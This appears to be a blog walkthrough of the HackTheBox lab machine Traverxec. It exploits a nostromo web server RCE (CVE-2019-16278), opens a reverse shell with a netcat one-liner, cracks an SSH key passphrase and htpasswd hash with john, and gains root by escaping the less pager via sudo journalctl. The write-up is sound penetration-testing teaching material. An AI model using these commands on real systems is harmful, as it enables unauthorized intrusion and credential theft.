HackTheBox - Traverxec

Traverxec was in my opinion a particular and interesting box. While being rated easy it still teach me a little trick and got me very frustrated at some point because it was super easy to overlook and overthink easy things. Still it was worth cogitate on it!

Tl;Dr: The user flag was accessible after using a Remote Code Execution exploit on the nhttpd web server running, giving us access to the www-data user. From here you were able to enter the user home directory and access to a backup archive containing its SSH private key. After brute-forcing the passphrase you could connect to the user account and grab the flag.
The root flag consisted in exploiting a misconfiguration in sudo config allowing to view journalctl entries as root without password. Since journalctl use less as a pager it was possible to break out from less running as root by spawning an interactive system shell.

Alright! Let’s get into the details now!

---

First thing first, let’s add the box IP to the hosts file:

[hg8@archbook ~]$ echo "10.10.10.165 traverxec.htb" >> /etc/hosts

and let’s start!

User Flag

Recon

Let’s start with the classic nmap scan to see which ports are open on the box:

[hg8@archbook ~]$ nmap -sV -sT -sC traverxec.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 15:36 CET
Nmap scan report for traverxec.htb (10.10.10.165)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open  http    nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have something super classical: A HTTP (port 80) and SSH (port 22) service open.

But in this result something immediately catch the eye : nostromo 1.9.6. That’s a really not common web server.

According to its documentation:

nhttpd is a simple, fast and secure HTTP server. It runs as a single
process, handling connections with select(2).

And actually while searching for informations about this web server (out of curiosity) the second result on Google was about a RCE vulnerability through directory transversal on version <= 1.9.6 (CVE-2019-16278).
A bash proof-of-concept is also available. Seems like we don’t need to search any further…

Let’s give it a try:

[hg8@archbook ~]$ git clone https://git.sp0re.sh/sp0re/Nhttpd-exploits.git
Cloning into 'Nhttpd-exploits'...
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 5 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (5/5), done.
[hg8@archbook ~]$ cd Nhttpd-exploits
[hg8@archbook ~]$ bash CVE-2019-16278.sh traverxec.htb 80 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

That was fast!

Note: Be careful when launching exploit, do not use CVE-2019-16279.sh since it will DoS the box (CVE-2019-16279)… It was a very hard box to solve because it would constantly get down probably because of people launching the wrong exploit by mistake.

Let’s now use it to open a reverse shell. First we start our listener:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585

And launch the exploit :

[hg8@archbook ~]$ bash CVE-2019-16278.sh traverxec.htb 80 "nc -e /bin/sh 10.10.10.10 8585"

We get the connection immediately:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.165:40048
www-data@traverxec:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

First thing first let’s see what the user is to locate the user.txt flag:

www-data@traverxec:/$ ls -la /home/
drwx--x--x  6 david david 4096 Nov 19 05:28 david
www-data@traverxec:/$ ls -la /home/david/
ls: cannot open directory '/home/david/': Permission denied

The user is david but unfortunately we have no rights to read or write files in his home directory. Let’s move on, we might find additional informations later.

Pivot www-data -> david

Looking around we find the configuration of the nostromo web server, hopefully we can find juicy informations there ?

www-data@traverxec:/$ cat /var/nostromo/conf/nhttpd.conf
# MAIN [MANDATORY]
servername        traverxec.htb
serverlisten        *
serveradmin        [email protected]
serverroot        /var/nostromo
servermimes        conf/mimes
docroot            /var/nostromo/htdocs
docindex        index.html
# LOGS [OPTIONAL]
logpid            logs/nhttpd.pid
# SETUID [RECOMMENDED]
user            www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons            /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs        /home
homedirs_public        public_www

The configuration gives the path to an .htpasswd file :

www-data@traverxec:/$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Maybe if we brute-force the password of this .htpasswd file we can reuse the found password to login as david to ssh. Let’s give it a try:

[hg8@archbook ~]$ echo "$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/" > david.hash
[hg8@archbook ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt david.hash
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Nowonly4me       (?)
Session completed

Alright! We managed to get the password. That’s a good news and a nice step. Let’s try to login as david now:

[hg8@archbook ~]$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.

No luck… su - david maybe ?

www-data@traverxec:/$ su - david
Password:
su: Authentication failure
www-data@traverxec:/$

Nop! Looks like a dead end here… Let’s go back at the beginning to make sure we didn’t miss anything.

First let’s check again the nhttpd.conf file:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
[...]
# HOMEDIRS [OPTIONAL]
homedirs        /home
homedirs_public        public_www

This HOMEDIRS option catch my eye, does that mean we could access david home directory using the web-server ? Let’s check the documentation:

www-data@traverxec:/$ man nhttpd
HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:
http://www.nazgul.ch/~hacki/
The content of the home directory is handled exactly the same way as a directory in your document root. If some users don't want that their home directory can be accessed via HTTP, they shall remove the world readable flag on their home directory and a caller will receive a 403 Forbidden response. Also, if basic authentication is enabled, a user can create an .htaccess file in his home directory and a caller will need to authenticate.
You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

Thats interesting!
Ok so we know our user is David, can we access his homedir?

[hg8@archbook ~]$ curl http://traverxec.htb/\~david/
<html>
<body><font style="sans-serif">
<h1>Private space.<br>Nothing here.
<br>Keep out!</h1>
</body>
</html>

“Nothing to see here”… That’s true, and running gobuster won’t help either. We need to find a way to list files and directories in david homedir, but how ? And this is where I got frustrated… After searching for a while I realized I overlooked something obvious. Let’s check again the permissions of david homedir:

www-data@traverxec:/$ ls -l /home/david/
ls: cannot open directory '/home/david': Permission denied
www-data@traverxec:/$ ls -l /home/
total 4
drwx--x--x 5 david david 4096 Dec 22 12:15 david

We indeed have no read nor write permissions, but we do have execute bit is set (x).

For a binary the x bit mean the file can be executed. But for directory, what does it mean then ?

The execute bit (x) allows the affected user to enter the directory, and access files and directories inside.

So we can not read nor write david homedir but we can enter it! Let’s give a try:

www-data@traverxec:/$ cd /home/david/public_www/
cd /home/david/public_www/
www-data@traverxec:/home/david/public_www$ ls -l
ls -l
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area

It worked! Once inside we notice another interesting folder: protected-file-area. Let’s see what’s it:

www-data@traverxec:/home/david/public_www/protected-file-area$ ls
backup-ssh-identity-files.tgz

A backup of ssh identity files ? This sure looks promising. Let’s extract it:

www-data@traverxec:/home/david/public_www/protected-file-area$ mkdir /tmp/.tmp
www-data@traverxec:/home/david/public_www/protected-file-area$ tar -xzf backup-ssh-identity-files.tgz -C /tmp/.tmp
www-data@traverxec:/home/david/public_www/protected-file-area$ cd /tmp/.tmp/home/david/
www-data@traverxec:/tmp/tmp/home/david$ ls -la .ssh/
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02 id_rsa.pub

Jackpot! We can now try to use this ssh key to access david account:

[hg8@archbook ~]$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':

It couldn’t have been this easy right? A passphrase is needed for this ssh key. Let’s fire john to see if we can brute-force the passphrase:

[hg8@archbook ~]$ ssh2john id_rsa > id_rsa.hash
[hg8@archbook ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt id_rsa.hash
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (ssh/id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:12 DONE (2019-11-18 11:06) 0.08012g/s 1149Kp/s 1149Kc/s 1149KC/s *7¡Vamos!
Session completed

john found hunter as a passphrase. We have all the pieces to login now:

[hg8@archbook ~]$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
7xxxxxxxxxxxxxxxxxxxxxd

Root Flag

Recon

First thing first, let’s check what’s inside david home directory:

david@traverxec:~$ ls -l
total 12
drwx------ 2 david david 4096 Dec 22 12:41  bin
drwxr-xr-x 3 david david 4096 Oct 25 15:45  public_www
-r--r----- 1 root  david   33 Oct 25 16:14  user.txt
david@traverxec:~$ ls -l bin
total 8
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh

Let’s first focus on the bin folder and server-stats.sh script:

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The line about journalctl looks particularly interesting since it’s used with sudo command without password. If we can abuse this journalctl command we can potentially escalate our privileges to root.

The best resource for finding example of abusing legitimate binaries is GTFOBins:

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.

According to it, journalctl can be used to elevate privileges thanks to the pager used (less):

Less can be used to break out from restricted environments by spawning an interactive system shell.

Let’s give it a try:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-11-18 07:00:54 EST, end at Mon 2019-11-18
Nov 18 07:00:58 traverxec systemd[1]: Starting nostromo nhttpd serv
Nov 18 07:00:58 traverxec systemd[1]: nostromo.service: Can't open
Nov 18 07:00:58 traverxec nhttpd[477]: started
Nov 18 07:00:58 traverxec nhttpd[477]: max. file descriptors = 1040
Nov 18 07:00:58 traverxec systemd[1]: Started nostromo nhttpd serve
!/bin/sh
# bash
root@traverxec:/home/david/bin# cd
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9xxxxxxxxxxxxxxxxx6

Now that we are root and done let’s not forget to clean up our changes to not spoil other users!

Additional notes

I will put here a few additional information about this box that could be useful to others.

.htpassw bruteforce

As you could have noticed in the user flag recon part, a .htpasswd if available, this one is used to restrict access to the protected-file-area folder in david homedir:

It was possible to brute-force this .htpasswd file even if it was not needed to solve the box. Here how to do it using the good old john:

www-data@traverxec:/$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

[hg8@archbook ~]$ echo "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/" > david.hash
[hg8@archbook ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt david.hash
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (?)
1g 0:00:01:35 DONE (2019-11-17 19:28) 0.01052g/s 111325p/s 111325c/s 111325C/s Noyoo..NovemberRain
Session completed
[hg8@archbook ~]$ john --show david.hash
david:Nowonly4me

Let’s now try to access the protected-file-area using those credentials:

Success!

---

That’s it folks! As always do not hesitate to contact me for any questions or feedbacks!

See you next time ;)

-hg8